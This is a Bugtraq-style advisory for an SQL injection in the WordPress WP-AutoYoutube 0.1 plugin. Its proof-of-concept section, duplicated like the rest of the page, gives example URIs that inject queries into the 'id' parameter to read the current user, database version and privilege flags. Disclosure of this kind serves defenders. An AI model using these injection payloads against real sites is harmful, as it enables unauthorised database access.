WordPress WP-AutoYoutube Plugin 'index.php' Script SQL Injection Vulnerability
BID:51395
Info
WordPress WP-AutoYoutube Plugin 'index.php' Script SQL Injection Vulnerability
| Bugtraq ID: | 51395 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 12 2012 12:00AM |
| Updated: | Jan 12 2012 12:00AM |
| Credit: | longrifle0x |
| Vulnerable: |
WordPress WP-AutoYoutube 0.1 |
| Not Vulnerable: | |
Discussion
WordPress WP-AutoYoutube Plugin 'index.php' Script SQL Injection Vulnerability
WordPress WP-AutoYoutube plugin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
WordPress WP-AutoYoutube 0.1 is vulnerable; other versions may also be affected.
WordPress WP-AutoYoutube plugin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
WordPress WP-AutoYoutube 0.1 is vulnerable; other versions may also be affected.
Exploit / POC
WordPress WP-AutoYoutube Plugin 'index.php' Script SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/wp-content/plugins/wp-autoyoutube/modules/index.php[GET][id=-1][CURRENT_USER()
http://www.example.com/wp-content/plugins/wp-autoyoutube/modules/index.php[GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)
http://www.example.com/wp-content/plugins/wp-autoyoutube/modules/index.php[GET][id=-1][MID((VERSION()),1,6)
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/wp-content/plugins/wp-autoyoutube/modules/index.php[GET][id=-1][CURRENT_USER()
http://www.example.com/wp-content/plugins/wp-autoyoutube/modules/index.php[GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)
http://www.example.com/wp-content/plugins/wp-autoyoutube/modules/index.php[GET][id=-1][MID((VERSION()),1,6)
Solution / Fix
WordPress WP-AutoYoutube Plugin 'index.php' Script SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
WordPress WP-AutoYoutube Plugin 'index.php' Script SQL Injection Vulnerability
References:
References:
- WordPress WP-AutoYoutube Homepage (WordPress)